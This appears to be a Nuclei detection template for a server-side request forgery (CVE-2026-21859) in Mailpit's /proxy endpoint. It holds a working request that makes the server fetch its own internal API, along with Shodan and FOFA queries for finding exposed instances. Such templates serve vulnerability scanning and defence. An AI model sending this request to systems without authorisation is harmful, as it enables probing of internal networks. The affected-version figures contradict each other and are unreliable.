id: CVE-2026-21859 info: name: Mailpit < 1.28.3 - Server-Side Request Forgery author: omarkurt severity: high description: | Mailpit <= 1.28.0 contains a server-side request forgery caused by insufficient validation of internal IP addresses in the /proxy endpoint, letting attackers make requests to internal network resources, exploit requires crafted HTTP GET requests. impact: | Attackers can access internal network services and APIs, potentially exposing sensitive internal resources. remediation: | Update to version 1.28.1 or later. reference: - https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/ - https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2026-21859 epss-score: 0.00947 epss-percentile: 0.76654 cwe-id: CWE-918 cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: axllent product: mailpit shodan-query: title:"Mailpit" fofa-query: title="Mailpit" tags: cve,cve2026,mailpit,axllent,oast,oob,ssrf,vkev http: - raw: - | GET /proxy?url=http://127.0.0.1:8025/api/v1/info HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '"Version"' - '"Database"' - '"RuntimeStats"' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 4b0a00483046022100c4d73d40380482ab8f9ef9e81aef5fa1894706792eeebd1ae60eb0d586a8e5730221008b6a566d7f08b9983d30a2a88940100c5e0d5e6bb0fbe42510ed0f1273a2ba24:922c64590222798bb761d5b6d8e72950